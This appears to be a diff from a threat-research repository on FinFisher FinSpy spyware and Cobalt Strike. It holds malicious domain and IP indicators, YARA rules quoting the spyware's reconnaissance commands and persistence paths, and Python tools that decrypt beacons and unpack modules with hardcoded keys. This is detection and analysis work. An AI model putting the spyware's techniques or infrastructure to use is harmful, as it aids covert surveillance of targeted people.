686 8138 16667520 TlvTypeDescription
687 8138 16667776 TlvTypeFilenameExtension Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/f/b
688 8138 16668032 TlvTypeSessionType
689 8138 16668224 TlvTypePeriod
690 8138 16668512 TlvTypeMobileTargetUID Lorg/xmlpush/v3/w, Lorg/xmlpush/v3/o/g, Lorg/xmlpush/v3/o/c, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/q/c, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/h/c, Lorg/xmlpush/v3/h/c, L/org/xmlpush/v3/o/h, L/org/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
691 8139 16668784 TlvTypeMobileTargetID Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
692 8139 16669072 TlvTypeMobilePlaintext
693 8139 16669328 TlvTypeMobileCompression Lorg/xmlpush/v3/k
694 8139 16669584 TlvTypeMobileEncryption Lorg/xmlpush/v3/o/m, Lorg/xmlpush/v3/h/c
695 8139 16669824 TlvTypeEncodingType
696 8139 16670576 TlvTypePhoneNumber Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/n/m, Lorg/xmlpush/v3/t/d, Lorg/xmlpush/v3/a/a, Lorg/xmlpush/v3/f/a, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/f/b, Lorg/xmlpush/v3/d/a, Lorg/xmlpush/v3/i/a
697 8140 custom config location mode 16670784 TlvTypeConfigCustomLocationMode
698 8140 custom config location mode 16672080 × unknown Lorg/xmlpush/v3/n/k
699 8140 custom config location mode 16671792 × unknown Lorg/xmlpush/v3/n/m
700 8142 network interface 16674928 TlvTypeNetworkInterface
701 8142 network interface 16675136 TlvTypeNetworkInterfaceMode
702 8142 network interface 16675440 TlvTypeNetworkInterfaceAddress
703 8142 network interface 16675696 TlvTypeNetworkInterfaceNetmask
704 8142 network interface 16675952 TlvTypeNetworkInterfaceGateway
705 8142 network interface 16676208 TlvTypeNetworkInterfaceDNS_1
706 8142 network interface 16676464 TlvTypeNetworkInterfaceDNS_2
707 8143 16677440 TlvTypeLoginTime
708 8143 16677696 TlvTypeLogoffTime
709 8143 16678720 TlvTypeGeneric_Type
710 8144 16678976 TlvTypeChecksum
711 8144 16679280 TlvTypeCity
712 8144 16679536 TlvTypeCountry
713 8144 16679792 TlvTypeCountryCode
714 8146 16683072 TlvTypeTargetType
715 8146 16683392 TlvTypeDurationString Lorg/xmlpush/v3/o/a
716 8146 16683904 × unknown Lorg/xmlpush/v3/n/m
717 8146 16684848 × unknown Lorg/xmlpush/v3/o/k, L/org/xmlpush/v3/h/c
718 8160 16712000 TlvTypeTargetConnectionBroken
719 8160 16712256 TlvTypeAgentConnectionBroken
720 8160 16712512 TlvTypeTargetOffline
721 8176 16744768 TlvTypeProxyConnectionBroken
722 4242 8688960 × unknown Lorg/xmlpush/v3/w
723 4242 8689296 × unknown Lorg/xmlpush/v3/w
724 4242 8689568 × unknown Lorg/xmlpush/v3/w
725 2752 5636992 × unknown Lorg/xmlpush/v3/n/k
726 2752 5637504 × unknown Lorg/xmlpush/v3/n/k
727 2752 5637760 × unknown Lorg/xmlpush/v3/n/k
728 2752 5636464 × unknown Lorg/xmlpush/v3/n/m
729 2752 5636736 × unknown Lorg/xmlpush/v3/n/m
730 2752 5637248 × unknown Lorg/xmlpush/v3/n/m
731 2753 5638256 × unknown Lorg/xmlpush/v3/n/m
732 2753 5638768 × unknown Lorg/xmlpush/v3/n/m
733 2754 5641600 × unknown Lorg/xmlpush/v3/n/m
734 2754 5640608 × unknown Lorg/xmlpush/v3/n/m
735 2754 5641120 × unknown Lorg/xmlpush/v3/n/m
736 2754 5640864 × unknown Lorg/xmlpush/v3/n/m
737 2754 5640352 × unknown Lorg/xmlpush/v3/n/m
738 2218 4542832 × unknown Lorg/xmlpush/v3/t/d
739 2218 4542624 × unknown Lorg/xmlpush/v3/t/d
740 8147 16685104 × unknown Lorg/xmlpush/v3/o/k, L/org/xmlpush/v3/h/c
741 8147 16685392 × unknown Lorg/xmlpush/v3/o/k, L/org/xmlpush/v3/h/c
742 2658 5444000 × unknown Lorg/xmlpush/v3/o/k
743 2658 5444512 × unknown Lorg/xmlpush/v3/o/k
744 2656 5440320 × unknown Lorg/xmlpush/v3/o/k
745 2656 5439904 × unknown Lorg/xmlpush/v3/o/k
746 2660 5447840 × unknown Lorg/xmlpush/v3/o/k
747 2722 5575072 × unknown Lorg/xmlpush/v3/o/a
748 2722 5575328 × unknown Lorg/xmlpush/v3/o/a
749 2722 config 5575840 × unknown Lorg/xmlpush/v3/o/a
750 2560 config 5243552 × unknown Lorg/xmlpush/v3/o/i
751 2560 config 5243296 × unknown Lorg/xmlpush/v3/o/i
752 4244 config 8693104 × unknown Lorg/xmlpush/v3/o/g
753 4244 config 8692080 × unknown Lorg/xmlpush/v3/o/g
754 4244 config 8692336 × unknown Lorg/xmlpush/v3/o/g
755 4244 config 8692592 × unknown Lorg/xmlpush/v3/o/g
756 4244 config 8692848 × unknown Lorg/xmlpush/v3/o/g
757 4244 config 8693360 × unknown Lorg/xmlpush/v3/o/g
758 4244 config 8691872 × unknown Lorg/xmlpush/v3/o/g
759 2690 config 5509536 × unknown Lorg/xmlpush/v3/o/b
760 2690 config 5510048 × unknown Lorg/xmlpush/v3/o/b
761 2692 config 5513376 × unknown Lorg/xmlpush/v3/o/b
762 2688 config 5505856 × unknown Lorg/xmlpush/v3/o/b
763 2688 config 5505440 × unknown Lorg/xmlpush/v3/o/b
764 2592 config 5309088 × unknown Lorg/xmlpush/v3/o/e
765 2602 5329824 × unknown Lorg/xmlpush/v3/o/e
766 2602 5330592 × unknown Lorg/xmlpush/v3/o/e
767 2602 5329568 × unknown Lorg/xmlpush/v3/o/e
768 2602 5330080 × unknown Lorg/xmlpush/v3/o/e
769 2596 5317536 × unknown Lorg/xmlpush/v3/o/e
770 2596 5317792 × unknown Lorg/xmlpush/v3/o/e
771 2596 5318048 × unknown Lorg/xmlpush/v3/o/e
772 2596 5317280 × unknown Lorg/xmlpush/v3/o/e
773 2594 5313440 × unknown Lorg/xmlpush/v3/o/e
774 2594 5312928 × unknown Lorg/xmlpush/v3/o/e
775 2594 5313184 × unknown Lorg/xmlpush/v3/o/e
776 2600 5325216 × unknown Lorg/xmlpush/v3/o/e
777 2598 5321376 × unknown Lorg/xmlpush/v3/o/e
778 2598 5322144 × unknown Lorg/xmlpush/v3/o/e
779 2784 mode location custom config 5703584 × unknown Lorg/xmlpush/v3/o/n
780 2784 mode location custom config 5703328 × unknown Lorg/xmlpush/v3/o/n
781 2784 mode location custom config 5702816 × unknown Lorg/xmlpush/v3/o/n
782 2784 interface network 5702032 × unknown Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
783 2784 interface network 5702304 × unknown Lorg/xmlpush/v3/h/c
784 2785 interface network 5703808 × unknown Lorg/xmlpush/v3/o/n
785 2785 interface network 5704064 × unknown Lorg/xmlpush/v3/o/n
786 1757 interface network 3600000 × unknown Lorg/xmlpush/v3/b/f
787 2696 interface network 5521552 × unknown Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
788 2696 interface network 5521568 × unknown Lorg/xmlpush/v3/h/c
789 2720 5570960 × unknown Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
790 2720 5571232 × unknown Lorg/xmlpush/v3/h/c
791 2756 5644432 × unknown Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
792 2756 5644704 × unknown Lorg/xmlpush/v3/h/c
793 2848 5833104 × unknown Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
794 2848 5833376 × unknown Lorg/xmlpush/v3/h/c
795 3104 6357392 × unknown Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
796 3104 6357664 × unknown Lorg/xmlpush/v3/h/c
797 2664 5456016 × unknown Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
798 2664 5456288 × unknown Lorg/xmlpush/v3/h/c
799 4243 8690064 × unknown Lorg/xmlpush/v3/q/c, L/org/xmlpush/v3/h/c
800 4243 8690336 × unknown Lorg/xmlpush/v3/h/c
801 4243 8689712 × unknown Lorg/xmlpush/v3/h/c, L/org/xmlpush/v3/h/c
802 2304 4719008 × unknown Lorg/xmlpush/v3/d/a
803 2304 4719232 × unknown Lorg/xmlpush/v3/d/a
804 3106 6361200 × unknown Lorg/xmlpush/v3/k/c
805 16425 33639248 × unknown Lorg/xmlpush/v3/h/a
806 48781 99903492 × unknown Lorg/b/b/e$gs, L/org/b/b/e$r
807 41609 85215461 × unknown Lorg/b/b/e$df, L/org/b/b/e$j
808 4494 9203775 × unknown Lorg/b/b/e$ol, L/org/b/b/e$pi
809 25586 52401552 × unknown Lorg/b/b/e$js, L/org/b/b/e$x
810 21214 43446532 × unknown Lorg/b/b/e$ec, L/org/b/b/e$m
811 27793 56920439 × unknown Lorg/b/b/e$az, L/org/b/b/e$d
812 26992 55281185 × unknown Lorg/b/b/e$nj, L/org/b/b/e$ag
813 44308 90744648 × unknown Lorg/b/b/e$ew, L/org/b/b/e$ev

View File

@@ -0,0 +1,4 @@
flash.browserupdate.download
current.browserupdate.download
files.browserupdate.download
browserupdate.download

View File

@@ -0,0 +1,6 @@
172.241.27.171
5.135.174.213
158.69.105.207
207.244.95.223
45.11.19.235
185.125.230.203

View File

@@ -0,0 +1,174 @@
rule finspy_linux_installer1 {
meta:
description = "Rule for FinSpy Linux installer x86 or x64"
author = "Etienne Maynier, Amnesty Tech"
sample = "8aaf886a2a2cd459e65277343bc951a2d23555980eddd73218a5c608e6d2a29c"
strings:
$a = "%s/.kde/Autostart" ascii wide nocase
$b = "%s/.kde4/Autostart" ascii wide nocase
$c = "dmesg --notime 2>/dev/null | grep -i \"hypervisor detected\" | cut -d ':' -f2" ascii wide nocase
$d = "g_plauncher" ascii wide nocase
$e = "g_pinstall_host_location" ascii wide nocase
$f = "g_pinstall_folder" ascii wide nocase
$g = "%s/.bash_profile" ascii wide nocase
$h = "lspci 2>/dev/null | grep -i \"system peripheral\" | grep -i \"virtual\"" ascii wide nocase
$i = "lspci | grep -i \"system peripheral\" | grep -i \"virtual\"" ascii nocase
condition:
7 of them
}
rule finppy_linux_coremodule {
meta:
description = "Rule for FinSpy Linux core module x86 or x64"
author = "Etienne Maynier, Amnesty Tech"
strings:
$s1 = "ps auxww | grep -iEe 'bt-scan' | grep -v -e grep" ascii
$s2 = "ls /sys/class/net/ 2>/dev/null | awk '{printf (\"%s\n\", $1)}' 2>/dev/null" ascii
$s3 = "cat /sys/class/net/eth?/address 2>/dev/null" ascii
$s4 = "dmesg --notime 2>/dev/null | grep -i \"cpu\" | grep -i \"virtual\"" ascii
$s5 = "/etc/hostname-merlin" ascii
$s6 = "@%02X%X%c%08X.dat" ascii
$s7 = "%s/.bash_profile1" ascii
$s8 = "%s/.kde4/share/config" ascii
$s9 = "ls /dev/disk/by-id/ 2>/dev/null" ascii
$s10 = "/index.php HTTP/1.1" ascii
condition:
uint16(0) == 0x457F and 8 of them
}
rule finspy_linux_installer2 {
meta:
description = "Rule for FinSpy Linux installer"
author = "Etienne Maynier, Amnesty Tech"
strings:
$encrypted_conf = { 5? a5 aa ca a6 54 5a ?? a? 5a a5 0a } /* header of configuration files */
$encrypted_bin_32 = { 7f 0d 45 4c 46 01 02 c2 14 68 03 05 0e } /* header of encrypted bin */
$encrypted_bin_64 = { 7f 07 45 4c 46 02 01 1e 15 01 8e 03 0e } /* header of encrypted bin */
condition:
(uint16(0) == 0x457F or uint16(0) == 0x2123) and (#encrypted_conf > 5 or #encrypted_bin_32 > 5 or #encrypted_bin_64 > 5)
}
rule finspy_macos_installer {
meta:
description = "Rule for FinSpy OSX installer"
author = "Etienne Maynier, Amnesty Tech"
strings:
$s1 = "80.bundle.zip" ascii
$s2 = "AAC.dat" ascii
$s3 = "arch.zip" ascii
$s4 = "/Library/LaunchAgents" ascii
$s5 = "7FC.dat" ascii
$s6 = "logind.plist" ascii
$s7 = "org.logind.ctp.archive" ascii
$s8 = "helper" ascii
$s9 = "Contents/Resources/7f.bundle/Contents/Resources" ascii
condition:
uint16(0) == 0xFACF and 8 of them
}
rule finspy_macos_datapkg {
meta:
description = "Rule for FinSpy OSX core module"
author = "Etienne Maynier, Amnesty Tech"
strings:
$s1 = "vlacwjwcefforoxisdryuvbqlxvxt" ascii
$s2 = "vquyqefxqpwytfuherfvzwaqqyanaddmvquyqefxqpwytfu" ascii
$s3 = "vsczabsutfuhajffslhlkulomhivwligvscza:" ascii
$s4 = "ijfrkptshbsurggfqxshpiolwupesxewijfrkptxnj" ascii
$s5 = "wwsodegezqrtafprejkrytzablizbddgwwsodegezqrtafprejxnj" ascii
$s6 = "clfggqtyflyspjewoxpodxesnpavcpofclfggqtyflyspjewoxpodxesnpavcpofclfggqtyflyspjewoxpodx" ascii
$s7 = "mhqxzxdbxsfblsxmidzcribjewzkezujmhqxzxdbxsfblsxmidzcribjewzkezujmh" ascii
$s8 = "sqpviurrqssxwzrzdwldcanprnsuadyhsqpvixnj" ascii
$s9 = "zfocytolmylaejykmwphsbchfkfzyadbzfocytolmylaejykmwphsbchfkfzyadbz" ascii
$s10 = "fehbsdjwmqrdndkskegllpixxabegjrdfehbsdjwmqrdndkske" ascii
$s11 = "exmycityouezjfdczebdfhqdgt:" ascii
$s12 = "denueozlbzhqzzdjhxjnjhoadjdsmashdenueozlbzhqzzd" ascii
condition:
uint16(0) == 0xFACF and 8 of them
}
rule finspy_android_configinapk : android apkhideconfig finspy {
meta:
description = "Detect FinFisher FinSpy configuration in APK file. Probably the original FinSpy version."
date = "2020/08/05"
reference = "https://github.com/devio/FinSpy-Tools"
author = "Esther Onfroy a.k.a U+039b - *@0x39b.fr (https://twitter.com/u039b)"
warning = "May have some False Positive"
strings:
$re = /\x50\x4B\x01\x02[\x00-\xff]{32}[A-Za-z0-9+\/]{6}/
condition:
uint32(0) == 0x04034b50 and $re and (#re > 50)
}
rule finspy_android_dexden : android dexhideconfig finspy
{
meta:
description = "Detect FinFisher FinSpy configuration in DEX file. Probably a newer FinSpy variant."
date = "2020/08/05"
author = "Esther Onfroy a.k.a U+039b - *@0x39b.fr (https://twitter.com/u039b)"
strings:
$config_1 = { 90 5b fe 00 }
$config_2 = { 70 37 80 00 }
$config_3 = { 40 38 80 00 }
$config_4 = { a0 33 84 }
$config_5 = { 90 79 84 00 }
condition:
uint16(0) == 0x6564 and
#config_1 >= 2 and
#config_2 >= 2 and
#config_3 >= 2 and
#config_4 >= 2 and
#config_5 >= 2
}
rule FinSpy_TippyTime: finspyTT {
meta:
description = "Detect FinFisher FinSpy 'TippyTime' variant."
date = "2020/08/05"
author = "Esther Onfroy a.k.a U+039b - *@0x39b.fr (https://twitter.com/u039b)"
strings:
$config_1 = { 90 5b fe 00 }
$config_2 = { 70 37 80 00 }
$config_3 = { 40 38 80 00 }
$config_4 = { a0 33 84 }
$config_5 = { 90 79 84 00 }
$timestamp = { 95 E9 D1 5B }
condition:
uint16(0) == 0x6564 and
$timestamp and
$config_1 and
$config_2 and
$config_3 and
$config_4 and
$config_5
}
rule FinSpy_TippyPad: finspyTP
{
meta:
description = "Detect FinFisher FinSpy 'TippyPad' variant."
date = "2020/08/05"
author = "Esther Onfroy a.k.a U+039b - *@0x39b.fr (https://twitter.com/u039b)"
strings:
$pad_1 = "0123456789abcdef"
$pad_2 = "fedcba9876543210"
condition:
uint16(0) == 0x6564 and
#pad_1 > 50 and
#pad_2 > 50
}

View File

@@ -0,0 +1,115 @@
import argparse
import struct
import re
import sys
import json
"""
Extract configuration from a Cobalt Strike decrypted beacon
Author : Etienne Maynier, Amnesty Tech
Date : March 2020
"""
CONFIG_STRUCT = {
1: "dns_ssl",
2: "port",
3: ".sleeptime",
4: ".http-get.server.output",
5: ".jitter",
6: ".maxdns",
7: "publickey",
8: ".http-get.uri",
9: ".user-agent",
10: ".http-post.uri",
11: ".http-get.server.output",
12: ".http-get.client",
13: ".http-post.client",
14: ".spawnto",
15: "unknown",
19: ".dns_idle",
20: ".dns_sleep ",
26: ".http-get.verb",
27: ".http-post.verb",
28: "shouldChunkPosts",
29: ".post-ex.spawnto_x86",
30: ".post-ex.spawnto_x64",
31: "cryptoscheme",
37: "watermark",
38: ".stage.cleanup",
39: "CFGCaution",
50: "cookieBeacon"
}
CONFIG_SIZE = 1978
class JsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, bytearray):
return obj.hex()
return json.JSONEncoder.default(self, obj)
def search_config(data):
r = re.search(b"ihihik.{2}ikihik", data)
if r:
return r.span()[0]
else:
return None
def decode_config(data):
config = {}
i = 0
while i < len(data) - 8:
dec = struct.unpack(">HHH", data[i:i+6])
if dec[0] == 1:
v = struct.unpack(">H", data[i+6:i+8])[0]
config["dns"] = ((v & 1) == 1)
config["ssl"] = ((v & 8) == 8)
elif dec[0] in CONFIG_STRUCT.keys():
if dec[1] == 1 and dec[2] == 2:
# Short
config[CONFIG_STRUCT[dec[0]]] = struct.unpack(">H", data[i+6:i+8])[0]
elif dec[1] == 2 and dec[2] == 4:
# Int
config[CONFIG_STRUCT[dec[0]]] = struct.unpack(">I", data[i+6:i+10])[0]
elif dec[1] == 3:
# Byte or string
v = data[i+6:i+6+dec[2]]
try:
config[CONFIG_STRUCT[dec[0]]] = v.decode('utf-8').strip('\x00')
except UnicodeDecodeError:
config[CONFIG_STRUCT[dec[0]]] = v
else:
print("Unknown config command {}".format(dec[0]))
# Add size +
i += dec[2] + 6
return config
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Extract Cobalt Strike configuration')
parser.add_argument('PAYLOAD', help='A Cobalt Strike beacon')
parser.add_argument('--json', '-j', action="store_true", help='Print json')
args = parser.parse_args()
with open(args.PAYLOAD, "rb") as f:
data = f.read()
START = search_config(data)
if not START:
print("Start position of the config struct not found")
sys.exit(-1)
# Configuration is xored with 105
conf = bytearray([c ^ 105 for c in data[START:START+CONFIG_SIZE]])
config = decode_config(conf)
if args.json:
print(json.dumps(config, indent=4, sort_keys=True, cls=JsonEncoder))
else:
for d in config:
if isinstance(config[d], bytearray):
print("{} : {}".format(d, config[d].hex()))
else:
print("{} : {}".format(d, config[d]))

View File

@@ -0,0 +1,51 @@
import argparse
import struct
import sys
"""
Decrypt a Cobalt Strike encrypted beacon
Author: Etienne Maynier, Amnesty Tech
Date: March 2020
"""
def xor(a, b):
return bytearray([a[0]^b[0], a[1]^b[1], a[2]^b[2], a[3]^b[3]])
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Decode an encoded Cobalt Strike beacon')
parser.add_argument('PAYLOAD', help='an integer for the accumulator')
args = parser.parse_args()
with open(args.PAYLOAD, "rb") as f:
data = f.read()
# The base address of the sample change depending on the code
ba = data.find(b"\xe8\xd4\xff\xff\xff")
if ba == -1:
ba = data.find(b"\xe8\xd0\xff\xff\xff")
if ba == -1:
print("Base Address not found")
sys.exit(1)
ba += 5
key = data[ba:ba+4]
print("Key : {}".format(key))
size = struct.unpack("I", xor(key, data[ba+4:ba+8]))[0]
print("Size : {}".format(size))
res = bytearray()
i = ba+8
while i < (len(data) - ba - 8):
d = data[i:i+4]
res += xor(d, key)
key = d
i += 4
if not res.startswith(b"MZ"):
print("Invalid decoding, no PE header")
with open("a.out", "wb+") as f:
f.write(res)
print("PE file extracted in a.out")

View File

@@ -0,0 +1,56 @@
import sys
import os
import struct
import hashlib
import ctypes
import binascii
import argparse
from Crypto.Cipher import AES
"""
Decode FinSpy modules for Linux and MacOS
Author : Maciek mak@malwarelab.pl
Date: August 2020
"""
def unpack(data, s=0):
"""
Decode the binary with aplib
"""
cin = ctypes.c_buffer(data)
cout = ctypes.c_buffer(s if s else len(data) * 20)
aplib_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"_aplib.so")
aPLIB = ctypes.cdll.LoadLibrary(aplib_path)
n = aPLIB.aP_depack(cin, cout)
return cout.raw[:n]
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Unpack FinSpy modules')
parser.add_argument('MODULE', help='Finspy module')
args = parser.parse_args()
with open(args.MODULE,'rb') as f:
hmd5 = f.read(0x10)
IV = f.read(0x10)
data = f.read()
hash_iv_data = hashlib.md5(IV + data)
if hmd5 == hash_iv_data.digest():
data = IV + data
IV = b'\xd9!V\xee\xbe\x0c\xf9\x18*\xfaR;%&\xb7\x08'
if hmd5 == hashlib.md5(data).digest():
print('[+] DATA HASH match {}'.format(binascii.hexlify(hmd5)))
key = b'YO\xf4\xa6\xd6\x1d\xd7!\xdc\x01A\xbfg\x83"m'
xdata = AES.new(key,mode=AES.MODE_CBC,IV=bytes(IV)).decrypt(data)
size = struct.unpack('I',xdata[:4])[0]
print('[+] Unpacked size: {:x}'.format(size))
depack = unpack(xdata[4:], size)
with open(args.MODULE + '.unpacked.bin','wb') as f:
f.write(depack)
print('[*] saved to {}.unpacked.bin'.format(sys.argv[1]))

View File

@@ -0,0 +1,38 @@
import os
import sys
import argparse
import re
import struct
"""
Extract configuration of Linux FinSpy from an installer
author: Etienne Maynier, Amnesty Tech
"""
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Extract configuration Linux Finspy sample')
parser.add_argument('FILE', help='FinSpy sample for Linux')
args = parser.parse_args()
regex_cfg = re.compile(b'.[\x50-\x5f]\xa5\xaa\xca\xa6\x54\x5a.[\xa0-\xaf]\x5a\xa5\x0a')
with open(args.FILE, 'rb') as f:
data = f.read()
if len(regex_cfg.findall(data)) < 5:
print("This does not look like a FinSpy sample")
sys.exit(-1)
if not os.path.isdir('extracted'):
os.mkdir('extracted')
i = 1
for cfg in regex_cfg.finditer(data):
pos = cfg.span()[0]
# Decrypt the first 4 bytes to get the length
length = struct.unpack('I', bytearray([data[pos]^0xaa, data[pos+1]^0x5a, data[pos+2]^0xa5, data[pos+3]^0xaa]))[0]
with open('extracted/{0:02d}.dat'.format(i), 'wb+') as f:
f.write(data[pos:pos+length])
print("Configuration file extracted {0:02d}.dat ({} bytes)".format(i, length))
i += 1

View File

@@ -0,0 +1,872 @@
import argparse
import os
import sys
import struct
#import simplejson as json
from json import JSONEncoder
import json
from io import BytesIO
"""
Decode configuration from FinSpy Linux, MacOS and Android samples
Python3 only
"""
__author__ = "Maciek mak@malwarelab.pl"
# From https://github.com/devio/FinSpy-Tools/blob/master/Android/finspyCfgParse.py
tlv_types = {
4522400: "TlvTypeMobileTrackingStartRequest",
4522656: "TlvTypeMobileTrackingStopRequest",
4523376: "TlvTypeMobileTrackingDataV10",
4535200: "TlvTypeMobileTrackingConfig",
4535440: "TlvTypeMobileTrackingConfigRaw",
4538432: "TlvTypeMobileTrackingTimeInterval",
4538688: "TlvTypeMobileTrackingDistance",
4538928: "TlvTypeMobileTrackingSendOnAnyChannel",
6291872: "TlvTypeMobileLoggingMetaInfo",
6292096: "TlvTypeMobileLoggingData",
4456864: "TlvTypeMobileBlackberryMessengerMetaInfo",
4457088: "TlvTypeMobileBlackberryMessengerData",
4457328: "TlvTypeMobileBlackberryMsChatID",
4457600: "TlvTypeMobileBlackberryMsConversationPartners",
4587936: "TlvTypeMobilePhoneCallLogsMetaInfo",
4588192: "TlvTypeMobilePhoneCallLogsData",
4588400: "TlvTypeMobilePhoneCallLogsType",
4588672: "TlvTypeMobilePhoneCallAdditionalInformation",
4588912: "TlvTypeMobilePhoneCallLogsCallerNumber",
4589168: "TlvTypeMobilePhoneCallLogsCalleeNumber",
4589440: "TlvTypeMobilePhoneCallLogsCallerName",
4589696: "TlvTypeMobilePhoneCallLogsCalleeName",
4591680: "TlvTypeMobilePhoneCallLogLastEntryEndtime",
4325792: "TlvTypeMobileSMSMetaInfo",
4326016: "TlvTypeMobileSMSData",
4326256: "TlvTypeSMSSenderNumber",
4326512: "TlvTypeSMSRecipientNumber",
4326768: "TlvTypeSMSDirection",
4326528: "TlvTypeSMSInformation",
4391328: "TlvTypeMobileAddressBookMetaInfo",
4391552: "TlvTypeMobileAddressBookData",
4407360: "TlvTypeMobileAddressBookChecksum",
8978752: "TlvTypeMobileProxyMasterCommSig",
8979104: "TlvTypeMobileProxyMasterComm",
8979360: "TlvTypeMobileMasterProxyComm",
8979616: "TlvTypeProxyMasterMobileHeartBeatAnswer",
8979872: "TlvTypeMobileMasterProxyCommNotification",
8782176: "TlvTypeProxyMobileTargetCommSig",
8782496: "TlvTypeProxyMobileTargetComm",
8782752: "TlvTypeProxyMasterMobileTargetComm",
1507744: "TlvTypeAccessedFileMetaInfo",
1507968: "TlvTypeAccessedFileAccessTime",
1508224: "TlvTypeAccessedFileAccessEvent",
1508496: "TlvTypeAccessedFileRecording",
1508736: "TlvTypeAccessedApplicationName",
1508912: "TlvTypeConfigRecordImagesFromExplorer",
1519776: "TlvTypeGetAccessedConfigRequest",
1520032: "TlvTypeAccessedConfigReply",
1520288: "TlvTypeSetAccessedConfigRequest",
1520448: "TlvTypeConfigAccessedEvents",
2240672: "TlvTypeGetMouseClicksConfigRequest",
2240928: "TlvTypeMouseClicksConfigReply",
2241184: "TlvTypeSetMouseClicksConfigRequest",
2228640: "TlvTypeMouseClicksMetaInfo",
2228896: "TlvTypeMouseClicksFrame",
2232448: "TlvTypeMouseClicksEncodingType",
2232896: "TlvTypeConfigMouseClicksRectangle",
2233152: "TlvTypeConfigMouseClicksSensitivity",
2233408: "TlvTypeConfigMouseClicksType",
2175136: "TlvTypeGetVoIPConfigRequest",
2175392: "TlvTypeVoIPConfigReply",
2175648: "TlvTypeSetVoIPConfigRequest",
2163104: "TlvTypeVoIPMetaInfo",
2166912: "TlvTypeVoIPEncodingType",
2167168: "TlvTypeVoIPSessionType",
2167424: "TlvTypeVoIPApplicationName",
2167696: "TlvTypeVoIPAppScreenshot",
2167952: "TlvTypeVoIPAudioRecording",
2168112: "TlvTypeConfigVoIPScreenshotEnabled",
2109600: "TlvTypeGetForensicsConfigRequest",
2109856: "TlvTypeForensicsConfigReply",
2110112: "TlvTypeSetForensicsConfigRequest",
2097568: "TlvTypeUploadForensicsApplicationRequest",
2097824: "TlvTypeUploadForensicsApplicationReply",
2098080: "TlvTypeUploadForensicsApplicationChunk",
2098336: "TlvTypeUploadForensicsApplicationDoneRequest",
2098592: "TlvTypeUploadForensicsApplicationDoneReply",
2101664: "TlvTypeRemoveForensicsApplicationRequest",
2101920: "TlvTypeRemoveForensicsApplicationReply",
2105760: "TlvTypeForensicsAppExecuteRequest",
2106016: "TlvTypeForensicsAppExecuteReply",
2106272: "TlvTypeForensicsAppExecuteResult",
2106528: "TlvTypeForensicsAppExecuteResultChunk",
2106784: "TlvTypeForensicsAppExecuteResultDone",
2107040: "TlvTypeForensicsCancelAppExecuteRequest",
2107296: "TlvTypeForensicsCancelAppExecuteReply",
2113680: "TlvTypeConfigForensicsApplicationInfoGeneric",
2113952: "TlvTypeConfigForensicsApplicationInfo",
2117760: "TlvTypeConfigForensicsApplicationName",
2117952: "TlvTypeConfigForensicsApplicationSize",
2118208: "TlvTypeConfigForensicsApplicationID",
2118528: "TlvTypeConfigForensicsApplicationCmdline",
2118784: "TlvTypeConfigForensicsApplicationOutput",
2118976: "TlvTypeConfigForensicsApplicationTimeout",
2119232: "TlvTypeConfigForensicsApplicationVersion",
2119552: "TlvTypeForensicsFriendlyName",
2119808: "TlvTypeConfigForensicsApplicationOutputPrepend",
2120064: "TlvTypeConfigForensicsApplicationOutputContentType",
1638816: "TlvTypeDeletedFileMetaInfo",
1639296: "TlvTypeDeletedFileDeletionTime",
1639552: "TlvTypeDeletedFileRecycleBin",
1639808: "TlvTypeDeletedMethod",
1640064: "TlvTypeDeletedApplicationName",
1640336: "TlvTypeDeletedFileRecording",
1650848: "TlvTypeGetDeletedConfigRequest",
1651104: "TlvTypeDeletedConfigReply",
1651360: "TlvTypeSetDeletedConfigRequest",
1573280: "TlvTypePrintFileMetaInfo",
1573520: "TlvTypePrintFrame",
1581184: "TlvTypePrintApplicationName",
1581440: "TlvTypePrintFilename",
1581696: "TlvTypePrintEncodingType",
1585312: "TlvTypeGetPrintConfigRequest",
1585568: "TlvTypePrintConfigReply",
1585824: "TlvTypeSetPrintConfigRequest",
1442208: "TlvTypeChangedFileMetaInfo",
1442432: "TlvTypeChangedFileChangeTime",
1442688: "TlvTypeChangedFileChangeEvent",
1442960: "TlvTypeChangedFileRecording",
1454240: "TlvTypeGetChangedConfigRequest",
1454496: "TlvTypeChangedConfigReply",
1454752: "TlvTypeSetChangedConfigRequest",
1454912: "TlvTypeConfigChangedEvents",
1311136: "TlvTypeSkypeAudioMetaInfo",
1311376: "TlvTypeSkypeAudioRecording",
1311648: "TlvTypeSkypeTextRecording",
1311904: "TlvTypeSkypeFileMetaInfo",
1312144: "TlvTypeSkypeFileRecording",
1312416: "TlvTypeSkypeContactsRecording",
1312640: "TlvTypeSkypeContactsUserData",
1323168: "TlvTypeGetSkypeConfigRequest",
1323424: "TlvTypeSkypeConfigReply",
1323680: "TlvTypeSetSkypeConfigRequest",
1324336: "TlvTypeConfigSkypeAudioEnable",
1324592: "TlvTypeConfigSkypeTextEnable",
1324848: "TlvTypeConfigSkypeFileEnable",
1325104: "TlvTypeConfigSkypeContactsListEnable",
1327232: "TlvTypeSkypeAudioEncodingType",
1327488: "TlvTypeSkypeLoggedInUserAccountName",
1327744: "TlvTypeSkypeConversationPartnerAccountName",
1328000: "TlvTypeSkypeConversationPartnerDisplayName",
1328256: "TlvTypeSkypeChatMembers",
1328512: "TlvTypeSkypeTextMessage",
